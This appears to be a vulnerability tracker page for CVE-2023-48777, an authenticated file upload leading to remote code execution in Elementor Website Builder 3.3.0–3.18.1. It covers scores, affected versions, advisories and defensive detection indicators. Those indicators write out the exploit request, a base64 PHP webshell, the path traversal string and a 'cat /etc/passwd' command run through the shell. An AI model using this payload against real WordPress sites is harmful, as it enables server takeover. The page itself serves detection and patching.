CVE-2023-48777
published 2024-03-26CVE-2023-48777: Unrestricted Upload of File with Dangerous Type vulnerability in Elementor.Com Elementor Website Builder.This issue affects Elementor Website Builder: from…
PriorityP179high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
4.10%
89.5th percentile
Unrestricted Upload of File with Dangerous Type vulnerability in Elementor.Com Elementor Website Builder.This issue affects Elementor Website Builder: from 3.3.0 through 3.18.1.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| elementor.com | elementor_website_builder | 3.3.0 – 3.18.1 | — |
| elementor | website_builder | >= 3.3.0 < 3.18.2 | 3.18.2 |
Detection & IOCsextracted from sources · hover to see the quote
url/wp-admin/admin-ajax.php
path/wp-content/plugins/elementor/
commandactions={{url_encode(payload)}}&_nonce={{nonce}}&editor_post_id=1&initial_document_id=1&action=elementor_ajax
command{"import_template":{"action":"import_template","data":{"fileName":"/../../../../{{filename}}.php","fileData":"PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4="}}}
path/../../../../<random>.php
url/wp-content/<random>.php?cmd=cat+/etc/passwd
url/wp-admin/post.php?post=1&action=elementor
bytes
PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=
- →Exploit targets the `elementor_ajax` action via admin-ajax.php with an `import_template` sub-action to upload a PHP webshell via path traversal in the `fileName` parameter.
- →The uploaded PHP webshell payload (base64: PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=) decodes to `<?php echo system($_GET['cmd']); ?>` — monitor for this string in uploaded files or POST bodies.
- →Path traversal sequence `/../../../../` in the `fileName` field of the import_template action is used to place the PHP file outside the intended upload directory — alert on this pattern in POST bodies to admin-ajax.php.
- →After upload, the webshell is accessed under /wp-content/<filename>.php with a `cmd` GET parameter — monitor for unexpected PHP file access under /wp-content/ with shell command parameters.
- →Successful exploitation confirmed by `root:.*:0:0:` pattern in HTTP response body — use this as a post-exploitation indicator in web server logs or WAF response inspection.
- →Vulnerability affects Elementor Website Builder versions 3.3.0 through 3.18.1; presence of the plugin at /wp-content/plugins/elementor/ on unpatched sites is a risk indicator. ↗
- ·Exploitation requires authentication at contributor-level or above; unauthenticated exploitation is not possible.
- ·Fixed in Elementor version 3.18.2; systems running 3.18.2 or later are not affected.
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
vulncheck9.9CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-vrwg-q62p-8qvc: Unrestricted Upload of File with Dangerous Type vulnerability in Elementor
ghsa_unreviewed·2024-03-26
CVE-2023-48777 [CRITICAL] CWE-434 GHSA-vrwg-q62p-8qvc: Unrestricted Upload of File with Dangerous Type vulnerability in Elementor
Unrestricted Upload of File with Dangerous Type vulnerability in Elementor.Com Elementor Website Builder.This issue affects Elementor Website Builder: from 3.3.0 through 3.18.1.
VulnCheck
Elementor.Com Elementor Website Builder Unrestricted Upload of File with Dangerous Type Vulnerability
vulncheck·2023·CVSS 9.9
CVE-2023-48777 [CRITICAL] Elementor.Com Elementor Website Builder Unrestricted Upload of File with Dangerous Type Vulnerability
Elementor.Com Elementor Website Builder Unrestricted Upload of File with Dangerous Type Vulnerability
Unrestricted Upload of File with Dangerous Type vulnerability in Elementor.Com Elementor Website Builder.This issue affects Elementor Website Builder: from 3.3.0 through 3.18.1.
Affected: elementor Website Builder
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/elementor/elementor-3180-authenticatedcontributor-arbitrary-file-upload-to-remote-code-execution-via-template-import
Exploit PoC: https://vulncheck.com/xdb/d62c85f39e42
No detection rules found.
Nuclei
WordPress Elementor 3.18.1 - File Upload/Remote Code Execution
nuclei·CVSS 8.8
CVE-2023-48777 [HIGH] WordPress Elementor 3.18.1 - File Upload/Remote Code Execution
WordPress Elementor 3.18.1 - File Upload/Remote Code Execution
The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.
Template:
id: CVE-2023-48777
info:
name: WordPress Elementor 3.18.1 - File Upload/Remote Code Execution
author: DhiyaneshDK
severity: critical
description: |
The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.
impact: |
Authenticated attackers with contributor-level access can exploit template import functionality to upload arb
No writeups or analysis indexed.
2024-03-26
Published
Exploited in the wild